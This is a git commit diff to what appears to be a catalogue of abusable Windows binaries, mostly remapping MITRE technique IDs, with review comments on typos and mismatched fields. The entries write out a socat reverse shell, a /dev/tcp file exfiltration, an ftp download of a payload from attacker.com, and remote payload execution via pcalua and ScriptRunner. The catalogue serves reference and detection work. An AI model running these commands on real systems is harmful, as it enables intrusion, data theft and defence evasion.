More changes (mainly changing some T1218 instances to T1202)

Wietze 2021-11-05 20:17:04 +00:00
parent 2577066af9
commit bc51cb4e03
No known key found for this signature in database
GPG Key ID: E17630129FF993CF
10 changed files with 19 additions and 19 deletions


@ -9,28 +9,28 @@ Commands:
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane" - Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24' - Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion. Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\bash.exe - Path: C:\Windows\System32\bash.exe
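Review bot: The Usecase on the second and third entries (reverse shell and exfiltration) is copied verbatim from the first ("Performs execution of specified file, can be used as a defensive evasion.") and no longer matches their Description, so the uniform switch to T1202 is only clearly justified for the plain execution and AWL bypass entries; give the reverse shell and exfiltration entries a Usecase that states what they actually do and a MitreID that reflects that behaviour rather than inheriting the execution technique. Also "reverseshell" in the second Description should be two words.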


@ -16,7 +16,7 @@ Commands:
Usecase: Use diskshadow to bypass defensive counter measures Usecase: Use diskshadow to bypass defensive counter measures
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1003 MitreID: T1202
OperatingSystem: Windows server OperatingSystem: Windows server
Full_Path: Full_Path:
- Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\System32\diskshadow.exe
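Review bot: Nothing in the visible context explains why T1003 was wrong and T1202 is right: the Command line sits outside the hunk and the Usecase "Use diskshadow to bypass defensive counter measures" describes no concrete behaviour. Since the old ID is a credential-access technique and the new one is an execution technique, a Usecase that says what the command launches or copies would let a reviewer confirm the remapping; "counter measures" is also conventionally one word.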


@ -9,14 +9,14 @@ Commands:
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: explorer.exe C:\Windows\System32\notepad.exe - Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion. Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 10 (Tested) OperatingSystem: Windows 10 (Tested)
Full_Path: Full_Path:
- Path: C:\Windows\explorer.exe - Path: C:\Windows\explorer.exe
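Review bot: The second entry's Description says "Execute calc.exe" while its Command launches C:\Windows\System32\notepad.exe; correct one of the two so the entry is self-consistent. The MitreID change itself is in line with the rest of the commit.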


@ -9,7 +9,7 @@ Commands:
Usecase: Use forfiles to start a new process to evade defensive counter measures Usecase: Use forfiles to start a new process to evade defensive counter measures
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder.
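Review bot: In the second Description, "Alternate Data Stream (AD)" should read "(ADS)"; "AD" is the usual shorthand for Active Directory and is misleading in an entry about NTFS streams. "counter measures" in the Usecase should also be one word.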


@ -9,7 +9,7 @@ Commands:
Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand Usecase: Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download Description: Download
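Review bot: "Description: Download" on the second entry is too terse to be useful; state what is retrieved and how (the command drives ftp.exe from a script file passed with -s:), matching the level of detail in the other files. The first entry's Usecase already documents "cmd /C YourCommand", so its T1202 remap is well supported by the visible context.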


@ -9,14 +9,14 @@ Commands:
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1216 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Gpscript /startup - Command: Gpscript /startup
Description: Executes startup scripts configured in Group Policy Description: Executes startup scripts configured in Group Policy
Usecase: Add local group policy logon script to execute file and hide from defensive counter measures Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
Category: Execute Category: Execute
Privileges: Administrator Privileges: Administrator
MitreID: T1216 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\System32\gpscript.exe
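Review bot: Both entries carry the Usecase "Add local group policy logon script ...", but the second Command is "Gpscript /startup" and its Description says it runs startup scripts, so "logon" is inaccurate there; change the second Usecase to refer to startup scripts. Note also that this hunk moves T1216 to T1218 while the rest of the commit moves T1218 to T1202; if gpscript.exe is intentionally kept under the signed-binary technique, a line in the commit message saying so would help future readers.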


@ -16,7 +16,7 @@ Commands:
Usecase: Execute process with HH.exe Usecase: Execute process with HH.exe
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\hh.exe - Path: C:\Windows\System32\hh.exe
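Review bot: Fine as is: hh.exe is an executable, so the earlier T1216 (a script proxy execution technique) was a misclassification, and T1202 matches the Usecase "Execute process with HH.exe".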


@ -9,21 +9,21 @@ Commands:
Usecase: Proxy execution of binary Usecase: Proxy execution of binary
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a \\server\payload.dll - Command: pcalua.exe -a \\server\payload.dll
Description: Open the target .DLL file with the Program Compatibilty Assistant. Description: Open the target .DLL file with the Program Compatibilty Assistant.
Usecase: Proxy execution of remote dll file Usecase: Proxy execution of remote dll file
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant. Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files Usecase: Execution of CPL files
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\pcalua.exe - Path: C:\Windows\System32\pcalua.exe
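Review bot: "Compatibilty" in the first visible Description is misspelt; the second entry spells "Compatibility" correctly, so the two lines should match. The three MitreID changes are consistent with the rest of the commit.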


@ -9,10 +9,10 @@ Commands:
Usecase: Execute binary through proxy binary to evade defensive counter measurments Usecase: Execute binary through proxy binary to evade defensive counter measurments
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd"
Description: Executes calc.cmde from remote server Description: Executes calc.cmd from remote server
Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments Usecase: Execute binary through proxy binary from external server to evade defensive counter measurments
Category: Execute Category: Execute
Privileges: User Privileges: User
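Review bot: The typo fix to "calc.cmd" is good, but both Usecase lines still read "counter measurments"; fix them to "countermeasures" in the same pass.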


@ -9,7 +9,7 @@ Commands:
Usecase: Proxy execution Usecase: Proxy execution
Category: Execute Category: Execute
Privileges: User Privileges: User
MitreID: T1216 MitreID: T1216.001
OperatingSystem: Windows 10 OperatingSystem: Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs - Path: C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
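Review bot: Moving to the sub-technique T1216.001 is the right granularity for pubprn.vbs, but it makes this the only entry in the commit mapped at sub-technique level; decide whether the other entries should follow or whether technique-level IDs should be kept throughout for consistency. The Usecase "Proxy execution" could also be more descriptive, as the Usecase lines in the other files are.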